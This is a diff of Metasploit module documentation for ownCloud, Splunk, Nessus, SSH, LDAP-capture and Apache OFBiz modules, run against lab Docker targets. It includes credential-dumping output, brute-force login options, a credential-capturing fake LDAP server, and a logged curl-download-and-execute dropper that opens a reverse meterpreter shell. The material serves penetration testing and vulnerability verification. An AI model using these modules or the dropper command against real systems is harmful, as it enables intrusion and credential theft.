+      - OWNCLOUD_MAIL_SMTP_PASSWORD=smtp_password
+      - OWNCLOUD_MAIL_SMTP_NAME=smtp_username
+      - OWNCLOUD_LICENSE_KEY=1122333
+      - OWNCLOUD_OBJECTSTORE_KEY=owncloud123456
+      - OWNCLOUD_OBJECTSTORE_SECRET=secret123456
+      - OWNCLOUD_OBJECTSTORE_REGION=us-east-1
+    healthcheck:
+      test: ["CMD", "/usr/bin/healthcheck"]
+      interval: 30s
+      timeout: 10s
+      retries: 5
+
+  mariadb:
+    image: mariadb:10.11 # minimum required ownCloud version is 10.9
+    container_name: owncloud_mariadb
+    restart: always
+    environment:
+      - MYSQL_ROOT_PASSWORD=owncloud
+      - MYSQL_USER=owncloud
+      - MYSQL_PASSWORD=owncloud
+      - MYSQL_DATABASE=owncloud
+      - MARIADB_AUTO_UPGRADE=1
+    command: ["--max-allowed-packet=128M", "--innodb-log-file-size=64M"]
+    healthcheck:
+      test: ["CMD", "mysqladmin", "ping", "-u", "root", "--password=owncloud"]
+      interval: 10s
+      timeout: 5s
+      retries: 5
+
+  redis:
+    image: redis:6
+    container_name: owncloud_redis
+    restart: always
+    command: ["--databases", "1"]
+    healthcheck:
+      test: ["CMD", "redis-cli", "ping"]
+      interval: 10s
+      timeout: 5s
+      retries: 5
+```
+
+You may need to add an aditional entry to `OWNCLOUD_TRUSTED_DOMAINS` which has the IP address of the host, such as `OWNCLOUD_TRUSTED_DOMAINS=localhost,192.68.1.1`
+
+If the `graph` app needs to be installed, use the following instructions:
+
+```
+docker exec -it owncloud_server /bin/bash
+cd apps
+wget "$(curl 'https://marketplace.owncloud.com/ajax/apps/graphapi/0.3.0' | sed 's/\\//g' | cut -d '"' -f 4)" -O graphapi-0.3.0.tar.gz
+rm -rf graphapi
+tar -zxf graphapi-0.3.0.tar.gz
+occ app:enable graphapi
+```
+
+## Verification Steps
+
+1. Install the application and plugin
+1. Start msfconsole
+1. Do: `use auxiliary/gather/owncloud_phpinfo_reader`
+1. Do: `set rhost [ip]`
+1. Do: `run`
+1. You should information from the system configuration
+
+## Options
+
+### ROOT
+
+Root path of the URI, which is different than `TARGETURI` as its ownCloud specific. Defaults to `all` which will try `''` (empty), and `owncloud`
+
+### ENDFILE
+
+The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`,
+`/.gif`, `/.png`, `/.html`, `/.ttf`, `/.woff`, `/.ico`, `/.jpg`, `/.jpeg`, `/.json`, `/.properties`, `/.min.map`, `/.js.map`, `/.auto.map`
+
+## Scenarios
+
+### ownCloud 10.12.1 from Docker Compose
+
+```
+resource (owncloud.rb)> use auxiliary/gather/owncloud_phpinfo_reader
+resource (owncloud.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (owncloud.rb)> set verbose true
+verbose => true
+resource (owncloud.rb)> run
+[*] Running module against 127.0.0.1
+[*] Checking: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
+[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
+[+] Loot stored to: /home/h00die/.msf4/loot/20231203153109_default_127.0.0.1_owncloud.phpinfo_453632.txt
+[+] License Key: 1122333
+[+] Hostname: b2b16d6f3ba6
+[+] Home: /root
+[+] Server Root: /var/www/owncloud
+[+] PWD: /var/www/owncloud
+[+] SMTP Username: smtp_username
+[+] SMTP Password: smtp_password
+[+] ownCloud Username: admin_username
+[+] ownCloud Password: admin_password
+[+] DB Host: mariadb:3306
+[+] DB Username: owncloud
+[+] DB Password: owncloud
+[+] DB Name: owncloud
+[+] Redis Host: redis
+[+] Redis Port: 6379
+[+] Objectstore Endpoint: https://s3.us-east-1.amazonaws.com
+[+] Objectstore Region: us-east-1
+[+] Objectsore Secret: secret123456
+[+] Objectstore Key: owncloud123456
+[+] Objectstore Bucket: owncloud
+[+] Credentials
+===========
+
+  Type             Host            Username             Password              Notes
+  ----             ----            --------             --------              -----
+  S3 Object Store  us-east-1       Key: owncloud123456  Secret: secret123456  Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
+  SMTP             127.0.0.1:25    smtp_username        smtp_password
+  mysql            127.0.0.1:8080  owncloud             owncloud
+  ownCloud         127.0.0.1:8080  admin_username       admin_password
+
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Splunk versions 6.2.3 through 7.0.1 allows information disclosure by appending
+`/__raw/services/server/info/server-info?output_mode=json` to a query.
+
+Versisons 6.6.0 through 7.0.1 require authentication.
+
+### Docker Install
+
+#### Splunk 6.5.5
+
+A vulnerable version of Splunk can be installed locally with docker:
+
+`docker run -p 8000:8000 -e "SPLUNK_PASSWORD=splunk" -e "SPLUNK_START_ARGS=--accept-license" -it --name so1 splunk/splunk:6.5.5`
+
+#### Splunk 7.1.0
+
+At startup it'll ask for a password for the system. You may need to login via the website and accept a license and restart
+the service (via website) for the instance to be exploitable. Splunk can be started via docker with:
+
+`docker run -p 8000:8000 -e "SPLUNK_START_ARGS=--accept-license" -it --name so2 splunk/splunk:7.1.0`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/splunk_raw_server_info`
+1. Do: `SET RHOSTS [IP]`
+1. You should receive output about the Splunk version and roles, license status, including license key info, and OS information.
+
+## Options
+
+## Scenarios
+
+### Splunk 6.5.5
+
+```
+msf6 > use auxiliary/gather/splunk_raw_server_info 
+msf6 auxiliary(gather/splunk_raw_server_info) > exploit
+[*] Running module against 127.0.0.1
+
+[+] Output saved to ~/.msf4/loot/20231220130955_default_127.0.0.1_splunk.system.st_442957.bin
+[+] Hostname: 3c7b9beb6c3c
+[+] CPU Architecture: x86_64
+[+] Operating System: Linux
+[+] OS Build: #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03)
+[+] OS Version: 6.5.0-kali2-amd64
+[+] Splunk Version: 6.5.5
+[+] Trial Version?: true
+[+] Splunk Forwarder?: false
+[+] Splunk Product Type: enterprise
+[+] License State: EXPIRED
+[+] License Key(s): []
+[+] Splunk Server Roles: ["indexer", "license_master"]
+[+] Splunk Server Startup Time: 2023-12-19 20:56:13
+```
+
+### Splunk 7.1.0
+
+```
+[msf](Jobs:0 Agents:0) > use auxiliary/gather/splunk_raw_server_info 
+[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set username admin
+username => admin
+[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set password splunksplunk
+password => splunksplunk
+[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set verbose true
+verbose => true
+[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > run
+[*] Running module against 127.0.0.1
+
+[+] Output saved to /root/.msf4/loot/20231220204049_default_127.0.0.1_splunk.system.st_943292.json
+[+] Hostname: 523a845e8652
+[+] CPU Architecture: x86_64
+[+] Operating System: Linux
+[+] OS Build: #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09)
+[+] OS Version: 6.5.0-kali3-amd64
+[+] Splunk Version: 7.1.0
+[+] Trial Version?: false
+[+] Splunk Forwarder?: false
+[+] Splunk Product Type: splunk
+[+] License State: OK
+[+] License Key(s): ["FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"]
+[+] Splunk Server Roles: ["indexer", "license_master"]
+[+] Splunk Server Startup Time: 2023-12-21 01:40:02
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,92 @@
+## Vulnerable Application
+
+This module will attempt to authenticate to a Nessus server's RPC interface.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/nessus/nessus_rest_login`
+3. Do: set usernames and passwords via the `username` and `password` options, or pass a list via `user_file` and `pass_file` options
+4. Do: `run`
+5. Hopefully you see somthing like this:
+```
+[+] 127.0.0.1:8834 - Successful: nessus:4x15pa$$w0rd
+```
+
+### Installation Steps
+This is a summary of installation steps for downloading, installing and running Nessus on Debian. They are as follows:
+
+1. Go to tenable.com.
+2. Download the latest version of nessus. Take note of the version number.
+3. Run the following command in the same directory as the .deb file: `dpkg -i Nessus-<version number>-debian6_amd64.deb`
+4. Restart nessus with the `systemctl start nessusd` command.
+5. Use your browser to access port 8834 on localhost (https://localhost:8834).
+
+## Options
+### BLANK_PASSWORDS
+Try blank passwords for all users
+
+### BRUTEFORCE_SPEED
+How fast to bruteforce, from 0 to 5
+
+### DB_ALL_CREDS
+Try each user/password couple stored in the current database
+
+### DB_ALL_PASS
+Add all passwords in the current database to the list
+
+### DB_ALL_USERS
+Add all users in the current database to the list
+
+### DB_SKIP_EXISTING
+Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+
+### PASSWORD
+A specific password to authenticate with
+
+### PASS_FILE
+File containing passwords, one per line
+
+### STOP_ON_SUCCESS
+Stop guessing when a credential works for a host
+
+### TARGETURI
+The path to the Nessus server login API
+
+### THREADS
+The number of concurrent threads (max one per host)
+
+### USERNAME
+A specific username to authenticate as
+
+### USERPASS_FILE
+File containing users and passwords separated by space, one pair per line
+
+### USER_AS_PASS
+Try the username as the password for all users
+
+### USER_FILE
+File containing usernames, one per line
+
+### VERBOSE
+Whether to print output for all attempts
+
+### VHOST
+HTTP server virtual host
+
+## Scenarios
+
+```
+msf > use scanner/nessus/nessus_rest_login
+msf6 auxiliary(scanner/nessus/nessus_rest_login) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/nessus/nessus_rest_login) > set password N0tpassword!
+password => N0tpassword!
+msf6 auxiliary(scanner/nessus/nessus_rest_login) > set username notuser
+username => notuser 
+msf6 auxiliary(scanner/nessus/nessus_rest_login) > run
+
+[*] Attempting to login to /stop using password list
+[+] 127.0.0.1:8834         -    Success: 'notuser:N0tpassword'!
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/nessus/nessus_rest_login) >
+```
@@ -0,0 +1,93 @@
+## Vulnerable Application
+
+This module can determine what public keys are configured for key-based authentication across a range of machines,
+users, and sets of known keys. The SSH protocol indicates whether a particular key is accepted prior to the client
+performing the actual signed authentication request. To use this module, a text file containing one or more SSH keys
+should be provided. These can be private or public, so long as no passphrase is set on the private keys.
+
+If you have loaded a database plugin and connected to a database, this module will record authorized public keys and
+hosts so you can track your process. Key files may be a single public (unencrypted) key, or several public keys
+concatenated together as an ASCII text file. Non-key data should be silently ignored. Private keys will only utilize
+the public key component stored within the key file.
+
+### Setup
+
+This module has been tested against Metasploitable2. Installation and setup instructions and additional
+information can be found in the Rapid7 documentation here: https://docs.rapid7.com/metasploit/metasploitable-2/
+
+## Verification Steps
+
+1. Have Metasploitable2 running
+1. Copy the `msfadmin`'s public key from `/home/msfadmin/.ssh/id_rsa.pub` to your machine
+1. Start `msfconsole -q`
+1. Do: `use auxiliary/scanner/ssh/ssh_identify_pubkeys`
+1. Do: `set rhosts`
+1. Do: `set username root`
+1. Do: `set key_path` to the copied `id_rsa.pub` file
+1. Do: `run`
+
+## Options
+
+### KEY_FILE
+
+Filename of one or several cleartext public keys.
+
+### SSH_DEBUG
+
+When enabled, outputs verbose SSH debug messages.
+
+### SSH_BYPASS
+
+When enabled, verify that authentication was not bypassed when keys are found.
+
+### SSH_KEYFILE_B64
+
+Raw data of an unencrypted SSH public key. This should be used by programmatic interfaces to this module only.
+
+### KEY_DIR
+
+Directory of several keys. Filenames must not begin with a dot in order to be read.
+
+### SSH_TIMEOUT
+
+The maximum time to negotiate a SSH session.
+
+## Scenarios
+
+### Metasploitable22
+
+```shell
+msf6 auxiliary(scanner/ssh/ssh_identify_pubkeys) > cat id_rsa.pub
+[*] exec: cat id_rsa.pub
+
+ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
+
+msf6 auxiliary(scanner/ssh/ssh_identify_pubkeys) > options
+
+Module options (auxiliary/scanner/ssh/ssh_identify_pubkeys):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   KEY_FILE          id_rsa.pub       yes       Filename of one or several cleartext public keys.
+   RHOSTS            192.168.112.178  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             22               yes       The target port
+   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          root             no        A specific username to authenticate as
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/ssh/ssh_identify_pubkeys) > run
+
+[*] 192.168.112.178:22 SSH - Trying 1 cleartext key per user.
+[+] 192.168.112.178:22 - [1/1] - Public key accepted: 'root' with key '57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a' (Private Key: No) - msfadmin@metasploitable
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -1,34 +1,260 @@
-## Description
-
-SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.  SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
-
-This module identifies the version of SSH service in use by the server based on the server's banner. Any SSH server should return this information.
-
 ## Vulnerable Application

+SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.
+SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
+
+This module identifies the version of SSH service in use by the server based on the server's banner.
+Any SSH server should return this information. It also identifies the varous cryptographic settings
+and vulnerabilities associated with those.
+
 This module is tested on several different SSH services, such as:

 - Virtual testing environment: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
 - `github.com`: SSH-2.0-babeld-38be96bc
 - `gitlab.com`: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8

+### Vulnerable Ubuntu 14.04.1
+
+The following `Dockerfile` can be used to create an Ubuntu 14.04.1 image with SSH running.
+
+```
+FROM ubuntu:14.04.1
+
+RUN apt-get update && apt-get -y install --no-install-recommends openssh-server=1:6.6p1-2ubuntu1 openssh-client=1:6.6p1-2ubuntu1 openssh-sftp-server=1:6.6p1-2ubuntu1
+RUN mkdir /var/run/sshd
+EXPOSE 22
+
+CMD ["/usr/sbin/sshd","-D"]
+```
+
 ## Verification Steps

  1. Do: `use auxiliary/scanner/ssh/ssh_version`
  2. Do: `set rhosts [ips]`
  3. Do: `run`

+## Options
+
+### EXTENDED_CHECKS
+
+Check for cryptographic issues. Defaults to `true`
+
 ## Scenarios

 ### SSH-2.0 on GitHub

-  ```
-msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_version
+```
+msf5 > use auxiliary/scanner/ssh/ssh_version
 msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com
 RHOSTS => github.com
 msf5 auxiliary(scanner/ssh/ssh_version) > run

-[+] 140.82.118.4:22       - SSH server version: SSH-2.0-babeld-38be96bc
-[*] github.com:22         - Scanned 1 of 1 hosts (100% complete)
+[*] 140.82.113.4 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMqqnkVzrm0SdG6UOoqKLsabgH5C9okWi0dh2l9GKJl
+[*] 140.82.113.4 - SSH server version: SSH-2.0-babeld-8405f9f3
+[*] 140.82.113.4 - Server Information and Encryption
+=================================
+
+  Type                           Value                                 Note
+  ----                           -----                                 ----
+  encryption.compression         none
+  encryption.compression         zlib@openssh.com
+  encryption.compression         zlib
+  encryption.encryption          chacha20-poly1305@openssh.com
+  encryption.encryption          aes256-gcm@openssh.com
+  encryption.encryption          aes128-gcm@openssh.com
+  encryption.encryption          aes256-ctr
+  encryption.encryption          aes192-ctr
+  encryption.encryption          aes128-ctr
+  encryption.hmac                hmac-sha2-512-etm@openssh.com
+  encryption.hmac                hmac-sha2-256-etm@openssh.com
+  encryption.hmac                hmac-sha2-512
+  encryption.hmac                hmac-sha2-256
+  encryption.host_key            ssh-ed25519
+  encryption.host_key            ecdsa-sha2-nistp256                   Weak elliptic curve
+  encryption.host_key            rsa-sha2-512
+  encryption.host_key            rsa-sha2-256
+  encryption.host_key            ssh-rsa
+  encryption.key_exchange        curve25519-sha256
+  encryption.key_exchange        curve25519-sha256@libssh.org
+  encryption.key_exchange        ecdh-sha2-nistp256
+  encryption.key_exchange        ecdh-sha2-nistp384
+  encryption.key_exchange        ecdh-sha2-nistp521
+  encryption.key_exchange        diffie-hellman-group-exchange-sha256
+  encryption.key_exchange        kex-strict-s-v00@openssh.com
+
+[*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-  ```
+```
+
+### Docker image
+
+```
+msf5 > use auxiliary/scanner/ssh/ssh_version
+msf6 auxiliary(scanner/ssh/ssh_version) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 auxiliary(scanner/ssh/ssh_version) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/ssh/ssh_version) > run
+
+[*] 172.17.0.2 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG52hWkobwr57akGxiK6eeMN9/M5MH+sQsNPv8Mci049
+[*] 172.17.0.2 - SSH server version: SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
+[+] 172.17.0.2 - Key Exchange (kex) diffie-hellman-group-exchange-sha1 is deprecated and should not be used.
+[+] 172.17.0.2 - Key Exchange (kex) diffie-hellman-group1-sha1 is deprecated and should not be used.
+[+] 172.17.0.2 - Host Key Encryption ecdsa-sha2-nistp256 uses a weak elliptic curve and should not be used.
+[+] 172.17.0.2 - HMAC hmac-md5 is deprecated and should not be used.
+[+] 172.17.0.2 - HMAC hmac-ripemd160 is deprecated and should not be used.
+[+] 172.17.0.2 - HMAC hmac-sha1-96 is deprecated and should not be used.
+[+] 172.17.0.2 - HMAC hmac-md5-96 is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption arcfour256 is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption arcfour128 is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption aes128-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption 3des-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption blowfish-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption cast128-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption aes192-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption aes256-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption arcfour is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption rijndael-cbc@lysator.liu.se is deprecated and should not be used.
+[*] 172.17.0.2 - Server Information and Encryption
+=================================
+
+  Type                           Value                                 Note
+  ----                           -----                                 ----
+  encryption.compression         none
+  encryption.compression         zlib@openssh.com
+  encryption.encryption          aes128-ctr
+  encryption.encryption          aes192-ctr
+  encryption.encryption          aes256-ctr
+  encryption.encryption          arcfour256                            Deprecated
+  encryption.encryption          arcfour128                            Deprecated
+  encryption.encryption          aes128-gcm@openssh.com
+  encryption.encryption          aes256-gcm@openssh.com
+  encryption.encryption          chacha20-poly1305@openssh.com
+  encryption.encryption          aes128-cbc                            Deprecated
+  encryption.encryption          3des-cbc                              Deprecated
+  encryption.encryption          blowfish-cbc                          Deprecated
+  encryption.encryption          cast128-cbc                           Deprecated
+  encryption.encryption          aes192-cbc                            Deprecated
+  encryption.encryption          aes256-cbc                            Deprecated
+  encryption.encryption          arcfour                               Deprecated
+  encryption.encryption          rijndael-cbc@lysator.liu.se           Deprecated
+  encryption.hmac                hmac-md5-etm@openssh.com
+  encryption.hmac                hmac-sha1-etm@openssh.com
+  encryption.hmac                umac-64-etm@openssh.com
+  encryption.hmac                umac-128-etm@openssh.com
+  encryption.hmac                hmac-sha2-256-etm@openssh.com
+  encryption.hmac                hmac-sha2-512-etm@openssh.com
+  encryption.hmac                hmac-ripemd160-etm@openssh.com
+  encryption.hmac                hmac-sha1-96-etm@openssh.com
+  encryption.hmac                hmac-md5-96-etm@openssh.com
+  encryption.hmac                hmac-md5                              Deprecated
+  encryption.hmac                hmac-sha1
+  encryption.hmac                umac-64@openssh.com
+  encryption.hmac                umac-128@openssh.com
+  encryption.hmac                hmac-sha2-256
+  encryption.hmac                hmac-sha2-512
+  encryption.hmac                hmac-ripemd160                        Deprecated
+  encryption.hmac                hmac-ripemd160@openssh.com
+  encryption.hmac                hmac-sha1-96                          Deprecated
+  encryption.hmac                hmac-md5-96                           Deprecated
+  encryption.host_key            ssh-rsa
+  encryption.host_key            ssh-dss
+  encryption.host_key            ecdsa-sha2-nistp256                   Weak elliptic curve
+  encryption.host_key            ssh-ed25519
+  encryption.key_exchange        curve25519-sha256@libssh.org
+  encryption.key_exchange        ecdh-sha2-nistp256
+  encryption.key_exchange        ecdh-sha2-nistp384
+  encryption.key_exchange        ecdh-sha2-nistp521
+  encryption.key_exchange        diffie-hellman-group-exchange-sha256
+  encryption.key_exchange        diffie-hellman-group-exchange-sha1    Deprecated
+  encryption.key_exchange        diffie-hellman-group14-sha1
+  encryption.key_exchange        diffie-hellman-group1-sha1            Deprecated
+  fingerprint_db                 ssh.banner
+  openssh.comment                Ubuntu-2ubuntu1
+  os.cpe23                       cpe:/o:canonical:ubuntu_linux:14.04
+  os.family                      Linux
+  os.product                     Linux
+  os.vendor                      Ubuntu
+  os.version                     14.04
+  service.cpe23                  cpe:/a:openbsd:openssh:6.6p1
+  service.family                 OpenSSH
+  service.product                OpenSSH
+  service.protocol               ssh
+  service.vendor                 OpenBSD
+  service.version                6.6p1
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Confirming using NMAP
+
+Utilizing the [ssh2-enum-algos](https://nmap.org/nsedoc/scripts/ssh2-enum-algos.html) NMAP script.
+
+```
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 14:55 EST
+Nmap scan report for 172.17.0.2
+Host is up (0.000099s latency).
+
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
+| ssh2-enum-algos: 
+|   kex_algorithms: (8)
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group-exchange-sha1
+|       diffie-hellman-group14-sha1
+|       diffie-hellman-group1-sha1
+|   server_host_key_algorithms: (4)
+|       ssh-rsa
+|       ssh-dss
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (16)
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       arcfour256
+|       arcfour128
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|       chacha20-poly1305@openssh.com
+|       aes128-cbc
+|       3des-cbc
+|       blowfish-cbc
+|       cast128-cbc
+|       aes192-cbc
+|       aes256-cbc
+|       arcfour
+|       rijndael-cbc@lysator.liu.se
+|   mac_algorithms: (19)
+|       hmac-md5-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-ripemd160-etm@openssh.com
+|       hmac-sha1-96-etm@openssh.com
+|       hmac-md5-96-etm@openssh.com
+|       hmac-md5
+|       hmac-sha1
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-ripemd160
+|       hmac-ripemd160@openssh.com
+|       hmac-sha1-96
+|       hmac-md5-96
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
+```
@@ -0,0 +1,52 @@
+
+## Vulnerable Application
+
+This module emulates an LDAP Server which accepts User Bind Request to capture the User Credentials.
+Upon receiving successful Bind Request, a `ldap_bind: Authentication method not supported (7)` error is sent to the User
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/server/capture/ldap`
+3. Do: `run`
+4. From a new shell or workstation, perform a ldap bind request involving User credentials.
+5. Check the database using `creds` for the user authentication information.
+
+## Options
+
+  **Authentication**
+  
+The type of LDAP authentication to capture. The default type is `Simple`
+
+## Scenarios
+
+### Metasploit Server
+
+```
+msf6 > use auxiliary/server/capture/ldap
+msf6 auxiliary(server/capture/ldap) > run
+
+[*] Server started.
+[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
+```
+
+### Client
+
+```
+└─$ ldapsearch -LLL -H ldap://10.0.2.15 -D cn=User,dc=example,dc=com -W
+Enter LDAP Password: 
+ldap_bind: Auth Method Not Supported (7)
+        additional info: Auth Method Not Supported
+```
+
+**Database**
+
+```
+msf6 auxiliary(server/capture/ldap) > creds
+Credentials
+===========
+
+host       origin     service         public  private  realm        private_type  JtR Format
+----       ------     -------         ------  -------  -----        ------------  ----------
+10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      
+```
@@ -4,14 +4,25 @@

 This module exploits a Java deserialization vulnerability in Apache
 OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
-versions prior to 17.12.04.
+versions prior to 17.12.01 using the `ROME` gadget chain.
+
+Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467
+and use the `CommonsBeanutils1` gadget chain.
+
+Verified working on 18.12.09, 17.12.01, and 15.12

 ### Setup

+#### 15.12
+
 You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.

 1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
-    * `docker run -p 8080:8080 -p 8443:8443  --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+    * `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+
+#### 18.12.09
+
+`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`

 ## Verification Steps

@@ -27,9 +38,11 @@ This executes a Unix command.

 This uses a Linux dropper to execute code.

+## Options
+
 ## Scenarios

-### Apache OFBiz from [Docker](#setup).
+### Apache OFBiz from [Docker](#setup) 15.12.

 ```
 msf6 > use exploit/linux/http/apache_ofbiz_deserialization
@@ -101,3 +114,50 @@ BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 meterpreter >
 ```
+
+### Apache OFBiz from [Docker](#setup) 18.12.09.
+
+```
+[msf](Jobs:0 Agents:0) > use exploit/linux/http/apache_ofbiz_deserialization
+[*] Using configured payload linux/x64/meterpreter_reverse_https
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rport 8080
+rport => 8080
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8999
+srvport => 8999
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lport 9999
+lport => 9999
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > exploit
+
+[*] Started HTTPS reverse handler on https://172.17.0.1:9999
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Apache OFBiz detected
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
+[*] Using URL: http://172.17.0.1:8999/t8Ht92vyG
+[*] Client 172.17.0.2 (curl/7.74.0) requested /t8Ht92vyG
+[*] Sending payload to 172.17.0.2 (curl/7.74.0)
+[+] Successfully executed command: curl -so /tmp/ccOiSBWw http://172.17.0.1:8999/t8Ht92vyG;chmod +x /tmp/ccOiSBWw;/tmp/ccOiSBWw;rm -f /tmp/ccOiSBWw
